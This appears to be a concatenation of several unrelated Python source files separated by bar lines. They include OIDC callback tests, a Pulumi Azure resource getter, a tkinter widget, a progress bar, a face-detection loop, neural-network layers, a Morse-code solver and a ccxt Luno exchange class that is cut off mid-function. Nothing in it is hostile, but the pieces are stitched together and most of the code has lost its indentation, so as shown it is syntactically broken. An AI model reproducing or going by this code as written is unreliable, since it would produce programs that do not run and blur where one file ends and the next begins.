@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("requests.get", return_value=MockedUserInfoResponse())
    def test_rp_callback_incorrect_request(self, mocked, mocked_2, mocked_3):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {})
self.assertTrue("error" in res.json())
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("spid_cie_oidc.relying_party.views.SpidCieOidcRpCallbackView.get_userinfo", return_value=None)
def test_rp_callback_no_userinfo(self, mocked, mocked_2, mocked_3):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
self.assertTrue(res.status_code == 400)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("spid_cie_oidc.relying_party.views.SpidCieOidcRpCallbackView.access_token_request", return_value=None)
def test_rp_callback_no_token_response(self, mocked, mocked_2):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
self.assertTrue(res.status_code == 400)
self.assertTrue("invalid token response" in res.content.decode())
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetNetworkVirtualApplianceResult',
'AwaitableGetNetworkVirtualApplianceResult',
'get_network_virtual_appliance',
]
@pulumi.output_type
class GetNetworkVirtualApplianceResult:
"""
NetworkVirtualAppliance Resource.
"""
def __init__(__self__, address_prefix=None, boot_strap_configuration_blobs=None, cloud_init_configuration=None, cloud_init_configuration_blobs=None, etag=None, id=None, identity=None, inbound_security_rules=None, location=None, name=None, nva_sku=None, provisioning_state=None, tags=None, type=None, virtual_appliance_asn=None, virtual_appliance_nics=None, virtual_appliance_sites=None, virtual_hub=None):
if address_prefix and not isinstance(address_prefix, str):
raise TypeError("Expected argument 'address_prefix' to be a str")
pulumi.set(__self__, "address_prefix", address_prefix)
if boot_strap_configuration_blobs and not isinstance(boot_strap_configuration_blobs, list):
raise TypeError("Expected argument 'boot_strap_configuration_blobs' to be a list")
pulumi.set(__self__, "boot_strap_configuration_blobs", boot_strap_configuration_blobs)
if cloud_init_configuration and not isinstance(cloud_init_configuration, str):
raise TypeError("Expected argument 'cloud_init_configuration' to be a str")
pulumi.set(__self__, "cloud_init_configuration", cloud_init_configuration)
if cloud_init_configuration_blobs and not isinstance(cloud_init_configuration_blobs, list):
raise TypeError("Expected argument 'cloud_init_configuration_blobs' to be a list")
pulumi.set(__self__, "cloud_init_configuration_blobs", cloud_init_configuration_blobs)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if inbound_security_rules and not isinstance(inbound_security_rules, list):
raise TypeError("Expected argument 'inbound_security_rules' to be a list")
pulumi.set(__self__, "inbound_security_rules", inbound_security_rules)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if nva_sku and not isinstance(nva_sku, dict):
raise TypeError("Expected argument 'nva_sku' to be a dict")
pulumi.set(__self__, "nva_sku", nva_sku)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_appliance_asn and not isinstance(virtual_appliance_asn, float):
raise TypeError("Expected argument 'virtual_appliance_asn' to be a float")
pulumi.set(__self__, "virtual_appliance_asn", virtual_appliance_asn)
if virtual_appliance_nics and not isinstance(virtual_appliance_nics, list):
raise TypeError("Expected argument 'virtual_appliance_nics' to be a list")
pulumi.set(__self__, "virtual_appliance_nics", virtual_appliance_nics)
if virtual_appliance_sites and not isinstance(virtual_appliance_sites, list):
raise TypeError("Expected argument 'virtual_appliance_sites' to be a list")
pulumi.set(__self__, "virtual_appliance_sites", virtual_appliance_sites)
if virtual_hub and not isinstance(virtual_hub, dict):
raise TypeError("Expected argument 'virtual_hub' to be a dict")
pulumi.set(__self__, "virtual_hub", virtual_hub)
@property
@pulumi.getter(name="addressPrefix")
def address_prefix(self) -> str:
"""
Address Prefix.
"""
return pulumi.get(self, "address_prefix")
@property
@pulumi.getter(name="bootStrapConfigurationBlobs")
def boot_strap_configuration_blobs(self) -> Optional[Sequence[str]]:
"""
BootStrapConfigurationBlobs storage URLs.
"""
return pulumi.get(self, "boot_strap_configuration_blobs")
@property
@pulumi.getter(name="cloudInitConfiguration")
def cloud_init_configuration(self) -> Optional[str]:
"""
CloudInitConfiguration string in plain text.
"""
return pulumi.get(self, "cloud_init_configuration")
@property
@pulumi.getter(name="cloudInitConfigurationBlobs")
def cloud_init_configuration_blobs(self) -> Optional[Sequence[str]]:
"""
CloudInitConfigurationBlob storage URLs.
"""
return pulumi.get(self, "cloud_init_configuration_blobs")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.ManagedServiceIdentityResponse']:
"""
The service principal that has read access to cloud-init and config blob.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter(name="inboundSecurityRules")
def inbound_security_rules(self) -> Sequence['outputs.SubResourceResponse']:
"""
List of references to InboundSecurityRules.
"""
return pulumi.get(self, "inbound_security_rules")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nvaSku")
def nva_sku(self) -> Optional['outputs.VirtualApplianceSkuPropertiesResponse']:
"""
Network Virtual Appliance SKU.
"""
return pulumi.get(self, "nva_sku")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualApplianceAsn")
def virtual_appliance_asn(self) -> Optional[float]:
"""
VirtualAppliance ASN.
"""
return pulumi.get(self, "virtual_appliance_asn")
@property
@pulumi.getter(name="virtualApplianceNics")
def virtual_appliance_nics(self) -> Sequence['outputs.VirtualApplianceNicPropertiesResponse']:
"""
List of Virtual Appliance Network Interfaces.
"""
return pulumi.get(self, "virtual_appliance_nics")
@property
@pulumi.getter(name="virtualApplianceSites")
def virtual_appliance_sites(self) -> Sequence['outputs.SubResourceResponse']:
"""
List of references to VirtualApplianceSite.
"""
return pulumi.get(self, "virtual_appliance_sites")
@property
@pulumi.getter(name="virtualHub")
def virtual_hub(self) -> Optional['outputs.SubResourceResponse']:
"""
The Virtual Hub where Network Virtual Appliance is being deployed.
"""
return pulumi.get(self, "virtual_hub")
class AwaitableGetNetworkVirtualApplianceResult(GetNetworkVirtualApplianceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkVirtualApplianceResult(
address_prefix=self.address_prefix,
boot_strap_configuration_blobs=self.boot_strap_configuration_blobs,
cloud_init_configuration=self.cloud_init_configuration,
cloud_init_configuration_blobs=self.cloud_init_configuration_blobs,
etag=self.etag,
id=self.id,
identity=self.identity,
inbound_security_rules=self.inbound_security_rules,
location=self.location,
name=self.name,
nva_sku=self.nva_sku,
provisioning_state=self.provisioning_state,
tags=self.tags,
type=self.type,
virtual_appliance_asn=self.virtual_appliance_asn,
virtual_appliance_nics=self.virtual_appliance_nics,
virtual_appliance_sites=self.virtual_appliance_sites,
virtual_hub=self.virtual_hub)
def get_network_virtual_appliance(expand: Optional[str] = None,
network_virtual_appliance_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkVirtualApplianceResult:
"""
NetworkVirtualAppliance Resource.
API Version: 2020-11-01.
:param str expand: Expands referenced resources.
:param str network_virtual_appliance_name: The name of Network Virtual Appliance.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['networkVirtualApplianceName'] = network_virtual_appliance_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network:getNetworkVirtualAppliance', __args__, opts=opts, typ=GetNetworkVirtualApplianceResult).value
return AwaitableGetNetworkVirtualApplianceResult(
address_prefix=__ret__.address_prefix,
boot_strap_configuration_blobs=__ret__.boot_strap_configuration_blobs,
cloud_init_configuration=__ret__.cloud_init_configuration,
cloud_init_configuration_blobs=__ret__.cloud_init_configuration_blobs,
etag=__ret__.etag,
id=__ret__.id,
identity=__ret__.identity,
inbound_security_rules=__ret__.inbound_security_rules,
location=__ret__.location,
name=__ret__.name,
nva_sku=__ret__.nva_sku,
provisioning_state=__ret__.provisioning_state,
tags=__ret__.tags,
type=__ret__.type,
virtual_appliance_asn=__ret__.virtual_appliance_asn,
virtual_appliance_nics=__ret__.virtual_appliance_nics,
virtual_appliance_sites=__ret__.virtual_appliance_sites,
virtual_hub=__ret__.virtual_hub)
|
import tkinter as tk
from tkinter import ttk
class NoteListUi:
def __init__(self, frame, add_note, save_note_with_title, remove_note_with_title, select_note):
self.frame = frame
self.note_list = tk.Listbox(self.frame, width=30, height=15)
self.note_list.select_note = select_note
self.note_list.bind('<<ListboxSelect>>', self.on_click_note_list)
self.menu_frame = ttk.Labelframe(self.frame)
self.menu_frame.pack()
self.create_button = tk.Button(self.menu_frame, text="Create", command=add_note)
self.create_button.pack(side="left")
self.update_button = tk.Button(self.menu_frame, text="Update", command=lambda: self.on_click_update_button(save_note_with_title))
self.update_button.pack(side="left")
self.remove_button = tk.Button(self.menu_frame, text="Remove", command=lambda: self.on_click_remove_button(remove_note_with_title))
self.remove_button.pack(side="left")
self.note_list.pack()
def on_click_update_button(self, update_note_with_title):
update_note_with_title(self.note_list.get(tk.ACTIVE))
def on_click_remove_button(self, remove_note_with_title):
remove_note_with_title(self.note_list.get(tk.ACTIVE))
def on_click_note_list(self, event):
if self.note_list.curselection():
self.note_list.select_note(self.note_list.get(self.note_list.curselection()))
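if __name__ == "__main__":
    # Standalone demo sketch: the callbacks below are placeholder lambdas,
    # not part of the original application wiring.
    root = tk.Tk()
    ui = NoteListUi(
        tk.Frame(root),
        add_note=lambda: print("add"),
        save_note_with_title=lambda title: print("save", title),
        remove_note_with_title=lambda title: print("remove", title),
        select_note=lambda title: print("select", title),
    )
    ui.frame.pack()
    root.mainloop()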
|
# -*- coding: UTF-8 -*-
import time
import sys
# import terminalcomman
import terminalsize
class RunBar:
term_size = terminalsize.get_terminal_size()[1]
def __init__(self, total_size, total_pieces=1):
self.displayed = False
self.total_size = total_size
self.total_pieces = total_pieces
self.current_piece = 1
self.received = 0
self.speed = ''
self.last_updated = time.time()
total_pieces_len = len(str(total_pieces))
        # 28 is the combined width of the statically known parts of self.bar
total_str = '%5s' % round(self.total_size / 1048576, 1)
total_str_width = max(len(total_str), 5)
self.bar_size = self.term_size - 28 - 2 * total_pieces_len \
- 2 * total_str_width
self.bar = '{0:>4}%% ({1:>%s}/%sMB) ├{2:<%s}┤[{3:>%s}/{4:>%s}] {5}' % (
total_str_width, total_str, self.bar_size, total_pieces_len,
total_pieces_len
)
def update(self):
self.displayed = True
bar_size = self.bar_size
percent = round(self.received * 100 / self.total_size, 1)
if percent >= 100:
percent = 100
        dots = bar_size * int(percent) // 100
        # fractional remainder of the filled width, used to pick a partial glyph
        plus = bar_size * percent / 100 - dots
if plus > 0.8:
plus = '█'
elif plus > 0.4:
plus = '>'
else:
plus = ''
bar = '█' * dots + plus
# print percent , round(self.received / 1048576, 1), bar,self.current_piece, self.total_pieces, self.speed
bar = self.bar.format(
percent, round(self.received / 1048576, 1), bar,
self.current_piece, self.total_pieces, self.speed
)
sys.stdout.write('\r' + bar)
sys.stdout.flush()
def update_received(self, n):
self.received += n
time_diff = time.time() - self.last_updated
bytes_ps = n / time_diff if time_diff else 0
if bytes_ps >= 1024 ** 3:
self.speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)
elif bytes_ps >= 1024 ** 2:
self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)
elif bytes_ps >= 1024:
self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)
else:
self.speed = '{:4.0f} B/s'.format(bytes_ps)
self.last_updated = time.time()
self.update()
def update_piece(self, n):
self.current_piece = n
def done(self):
if self.displayed:
print()
self.displayed = False
if __name__ == "__main__":
bar = RunBar(10000000)
from time import sleep
from random import randint
for i in range(1000):
bar.update_received(randint(10000,100000))
sleep(0.3)
|
# -*- coding: utf-8 -*-
import cv2
import sys
import gc
from train import Model
if __name__ == '__main__':
    if len(sys.argv) != 1:
        print("Usage: %s\r\n" % (sys.argv[0]))
        sys.exit(0)
    # Load the trained model
    model = Model()
    model.load_model(file_path='../model/face.model.h5')
    # Color of the rectangle drawn around detected faces
    color = (0, 255, 0)
    # Capture the live video stream from the default camera
    cap = cv2.VideoCapture(0)
    # Local path of the face-detection cascade classifier
    # cascade_path = "haarcascade_frontalface_alt2.xml"
    # Detect and recognize faces in a loop
    while True:
        ret, frame = cap.read()  # read one video frame
        if ret is True:
            # Convert to grayscale to reduce computational cost
            frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        else:
            continue
        faceID = model.face_predict(frame)
        # If a face is present
        if faceID == 0:
            # Annotate the frame with the result
            cv2.putText(frame, 'There is face',
                        (30, 30),                  # position
                        cv2.FONT_HERSHEY_SIMPLEX,  # font
                        1,                         # font scale
                        (255, 0, 255),             # color
                        2)                         # line width
        else:
            cv2.putText(frame, 'There is no face',
                        (30, 30),                  # position
                        cv2.FONT_HERSHEY_SIMPLEX,  # font
                        1,                         # font scale
                        (255, 0, 255),             # color
                        2)                         # line width
        cv2.imshow("Face Recognition", frame)
        # Wait 10 ms for a key press
        k = cv2.waitKey(10)
        # Exit the loop on 'q'
        if k & 0xFF == ord('q'):
            break
    # Release the camera and destroy all windows
    cap.release()
    cv2.destroyAllWindows()
|
import numpy as np
from layer_utils import *
""" Super Class """
class Module(object):
def __init__(self):
self.params = {}
self.grads = {}
    def forward(self):
        raise NotImplementedError
    def backward(self):
        raise NotImplementedError
""" Classes """
class TestFCReLU(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
########## TODO: ##########
fc(12, 10, name='my_fc'),
relu(name='my_relu')
########### END ###########
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class SmallFullyConnectedNetwork(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
########## TODO: ##########
fc(4, 30, name='fc1'),
relu(name='relu1'),
fc(30, 7, name='fc2'),
relu(name='relu2')
########### END ###########
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class DropoutNet(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.dropout = dropout
self.seed = seed
self.net = sequential(
fc(15, 20, 5e-2, name="fc1"),
relu(name="relu1"),
fc(20, 30, 5e-2, name="fc2"),
relu(name="relu2"),
fc(30, 10, 5e-2, name="fc3"),
relu(name="relu3"),
dropout(dropout_p, seed=seed)
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class TinyNet(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
""" Some comments """
self.net = sequential(
########## TODO: ##########
fc(3*32*32, 512, 2/(float(3072+512)), name="fc1"),
relu(name="relu1"),
fc(512, 10, 2/float(512+10), name="fc2"),
relu(name="relu2")
########### END ###########
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class DropoutNetTest(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.dropout = dropout
self.seed = seed
self.net = sequential(
fc(3072, 500, 1e-2, name="fc1"),
relu(name="relu1"),
fc(500, 500, 1e-2, name="fc2"),
relu(name="relu2"),
fc(500, 10, 1e-2, name="fc3"),
dropout(dropout_p, seed=seed)
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class FullyConnectedNetwork_2Layers(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
fc(5, 5, name="fc1"),
relu(name="relu1"),
fc(5, 5, name="fc2")
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class FullyConnectedNetwork(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
fc(3072, 100, 5e-2, name="fc1"),
relu(name="relu1"),
fc(100, 100, 5e-2, name="fc2"),
relu(name="relu2"),
fc(100, 100, 5e-2, name="fc3"),
relu(name="relu3"),
fc(100, 100, 5e-2, name="fc4"),
relu(name="relu4"),
fc(100, 100, 5e-2, name="fc5"),
relu(name="relu5"),
fc(100, 10, 5e-2, name="fc6")
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
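if __name__ == "__main__":
    # Smoke-test sketch: assumes layer_utils provides the fc/relu/sequential
    # layers used throughout this file. Shapes follow TestFCReLU's fc(12, 10).
    np.random.seed(0)
    net = TestFCReLU()
    x = np.random.randn(4, 12).astype(np.float32)
    out = net.forward(x, is_Training=False)
    dx = net.backward(np.ones_like(out))
    print(out.shape, dx.shape)  # expected: (4, 10) (4, 12)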
|
from enum import Enum
from typing import (
List,
Optional,
)
_Signals = Enum("Signals", ["DOT", "DASH"])
_Pauses = Enum("Pauses", ["SIGNAL", "LETTER", "WORD"])
_ON_TIMINGS = {
0.25: _Signals.DOT,
0.75: _Signals.DASH,
}
_OFF_TIMINGS = {
0.25: _Pauses.SIGNAL,
1.25: _Pauses.LETTER,
2.50: _Pauses.WORD,
}
_ORDERED_WORDS = (
'shell',
'halls',
'slick',
'trick',
'boxes',
'leaks',
'strobe',
'bistro',
'flick',
'bombs',
'break',
'brick',
'steak',
'sting',
'vector',
'beats',
)
def _make_letters():
# This function is here so that we can expose the _Signals variables with nice names, which makes the dictionary
# below much nicer. This should only be called once, to initialize the _LETTERS variable.
dot = _Signals.DOT
dash = _Signals.DASH
return {
(dot, dash): 'a',
(dash, dot, dot, dot): 'b',
(dash, dot, dash, dot): 'c',
(dash, dot, dot): 'd',
(dot,): 'e',
(dot, dot, dash, dot): 'f',
(dash, dash, dot): 'g',
(dot, dot, dot, dot): 'h',
(dot, dot): 'i',
(dot, dash, dash, dash): 'j',
(dash, dot, dash): 'k',
(dot, dash, dot, dot): 'l',
(dash, dash): 'm',
(dash, dot): 'n',
(dash, dash, dash): 'o',
(dot, dash, dash, dot): 'p',
(dash, dash, dot, dash): 'q',
(dot, dash, dot): 'r',
(dot, dot, dot): 's',
(dash,): 't',
(dot, dot, dash): 'u',
(dot, dot, dot, dash): 'v',
(dot, dash, dash): 'w',
(dash, dot, dot, dash): 'x',
(dash, dot, dash, dash): 'y',
(dash, dash, dot, dot): 'z',
}
_LETTERS = _make_letters()
def _get_closest_time_entry(seconds, timing_dict):
distances = [(abs(seconds - reference_duration), pause_type)
                 for reference_duration, pause_type in timing_dict.items()]
distances = sorted(distances, key=lambda x: x[0])
return distances[0][1]
def _signals_to_letter(signals):
return _LETTERS[tuple(signals)]
class MorseCodeState(object):
def __init__(self):
super(MorseCodeState, self).__init__()
self.word_start_index = None
# Assuming words are 5 letters long
self.letters = [None] * 5
self.next_letter_index = 0
self.current_partial_letter = None # type: Optional[List[_Signals]]
def ingest_timing(self, seconds, is_on):
"""It is invalid to call this once is_word_known returns True"""
if is_on:
if self.current_partial_letter is None:
return
signal = _get_closest_time_entry(seconds, _ON_TIMINGS)
self.current_partial_letter.append(signal)
else:
pause_type = _get_closest_time_entry(seconds, _OFF_TIMINGS)
if pause_type == _Pauses.SIGNAL:
return
# Handle letter or word gap. Both do the letter behavior.
if self.current_partial_letter is not None:
letter = _signals_to_letter(self.current_partial_letter)
print "ADDING LETTER:", letter
self.letters[self._get_next_letter_index()] = letter
# Assume we'll never wrap around, since we should know what the word is by then.
self.next_letter_index += 1
self.current_partial_letter = []
if pause_type == _Pauses.WORD:
# It's possible this is the last thing we see, in which case we'll need to make sure it's within
# the range of the array.
self.word_start_index = self._get_next_letter_index()
def _get_next_letter_index(self):
return self.next_letter_index % len(self.letters)
def _get_word_if_possible(self):
# This function tries to find the word given a subset of the total possible information
if self.next_letter_index == 0:
# We have no information yet, so we can't know the word yet.
return None
def find_single_matching_word(predicate):
# This helper function will check to see if exactly one word matches the given predicate. If so, it will
# return that word, otherwise it'll return None.
possible_word = None
for word in _ORDERED_WORDS:
if predicate(word):
if possible_word is not None:
# Multiple possibilities, we don't know what word it is
return None
possible_word = word
return possible_word
if self.word_start_index is None:
# No start index, so we have to look inside every word
partial_word = "".join(self.letters[:self._get_next_letter_index()])
return find_single_matching_word(lambda word: partial_word in word)
else:
# We have a start index, can check beginnings and ends of words
end = "".join(self.letters[:self.word_start_index])
start = "".join(self.letters[self.word_start_index:self._get_next_letter_index()])
return find_single_matching_word(lambda word: word.startswith(start) and word.endswith(end))
def is_word_known(self):
word = self._get_word_if_possible()
if word is None and self.next_letter_index >= 2 * len(self.letters):
assert False, "Can't find word, but got all letters twice: {}".format(self.letters)
return word is not None
def get_num_time_to_press_right_arrow(self):
word = self._get_word_if_possible()
assert word is not None
return _ORDERED_WORDS.index(word)
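if __name__ == "__main__":
    # Minimal self-check using the nominal durations from _ON_TIMINGS and
    # _OFF_TIMINGS above: a word gap opens letter tracking, a single dot
    # follows, and a letter gap commits the letter 'e'.
    state = MorseCodeState()
    state.ingest_timing(2.50, is_on=False)  # word gap
    state.ingest_timing(0.25, is_on=True)   # one DOT
    state.ingest_timing(1.25, is_on=False)  # letter gap commits 'e'
    print(state.letters)  # ['e', None, None, None, None]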
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import base64
from ccxt.base.errors import ExchangeError
class luno (Exchange):
def describe(self):
return self.deep_extend(super(luno, self).describe(), {
'id': 'luno',
'name': 'luno',
'countries': ['GB', 'SG', 'ZA'],
'rateLimit': 10000,
'version': '1',
'has': {
'CORS': False,
'fetchTickers': True,
'fetchOrder': True,
'fetchOrders': True,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchTradingFees': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766607-8c1a69d8-5ede-11e7-930c-540b5eb9be24.jpg',
'api': 'https://api.mybitx.com/api',
'www': 'https://www.luno.com',
'doc': [
'https://www.luno.com/en/api',
'https://npmjs.org/package/bitx',
'https://github.com/bausmeier/node-bitx',
],
},
'api': {
'public': {
'get': [
'orderbook',
'orderbook_top',
'ticker',
'tickers',
'trades',
],
},
'private': {
'get': [
'accounts/{id}/pending',
'accounts/{id}/transactions',
'balance',
'fee_info',
'funding_address',
'listorders',
'listtrades',
'orders/{id}',
'quotes/{id}',
'withdrawals',
'withdrawals/{id}',
],
'post': [
'accounts',
'postorder',
'marketorder',
'stoporder',
'funding_address',
'withdrawals',
'send',
'quotes',
'oauth2/grant',
],
'put': [
'quotes/{id}',
],
'delete': [
'quotes/{id}',
'withdrawals/{id}',
],
},
},
})
async def fetch_markets(self):
markets = await self.publicGetTickers()
result = []
for p in range(0, len(markets['tickers'])):
market = markets['tickers'][p]
id = market['pair']
base = id[0:3]
quote = id[3:6]
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetBalance()
wallets = response['balance']
result = {'info': response}
for b in range(0, len(wallets)):
wallet = wallets[b]
currency = self.common_currency_code(wallet['asset'])
reserved = float(wallet['reserved'])
unconfirmed = float(wallet['unconfirmed'])
balance = float(wallet['balance'])
account = {
'free': 0.0,
'used': self.sum(reserved, unconfirmed),
'total': self.sum(balance, unconfirmed),
}
account['free'] = account['total'] - account['used']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
orderbook = await self.publicGetOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = orderbook['timestamp']
return self.parse_order_book(orderbook, timestamp, 'bids', 'asks', 'price', 'volume')
def parse_order(self, order, market=None):
timestamp = order['creation_timestamp']
status = 'open' if (order['state'] == 'PENDING') else 'closed'
side = 'sell' if (order['type'] == 'ASK') else 'buy'
if market is None:
market = self.find_market(order['pair'])
symbol = market['symbol']
price = self.safe_float(order, 'limit_price')
amount = self.safe_float(order, 'limit_volume')
quoteFee = self.safe_float(order, 'fee_counter')
baseFee = self.safe_float(order, 'fee_base')
filled = self.safe_float(order, 'base')
cost = self.safe_float(order, 'counter')
remaining = None
if amount is not None:
if filled is not None:
remaining = max(0, amount - filled)
fee = {'currency': None}
if quoteFee:
fee['side'] = 'quote'
fee['cost'] = quoteFee
else:
fee['side'] = 'base'
fee['cost'] = baseFee
return {
'id': order['order_id'],
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': None,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'cost': cost,
'remaining': remaining,
'trades': None,
'fee': fee,
'info': order,
}
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
response = await self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
async def fetch_orders_by_state(self, state=None, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
market = None
if state is not None:
request['state'] = state
if symbol is not None:
market = self.market(symbol)
request['pair'] = market['id']
response = await self.privateGetListorders(self.extend(request, params))
orders = self.safe_value(response, 'orders', [])
return self.parse_orders(orders, market, since, limit)
async def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state(None, symbol, since, limit, params)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('PENDING', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('COMPLETE', symbol, since, limit, params)
def parse_ticker(self, ticker, market=None):
timestamp = ticker['timestamp']
symbol = None
if market:
symbol = market['symbol']
last = self.safe_float(ticker, 'last_trade')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': self.safe_float(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_float(ticker, 'ask'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'rolling_24_hour_volume'),
'quoteVolume': None,
'info': ticker,
}
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
response = await self.publicGetTickers(params)
tickers = self.index_by(response['tickers'], 'pair')
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
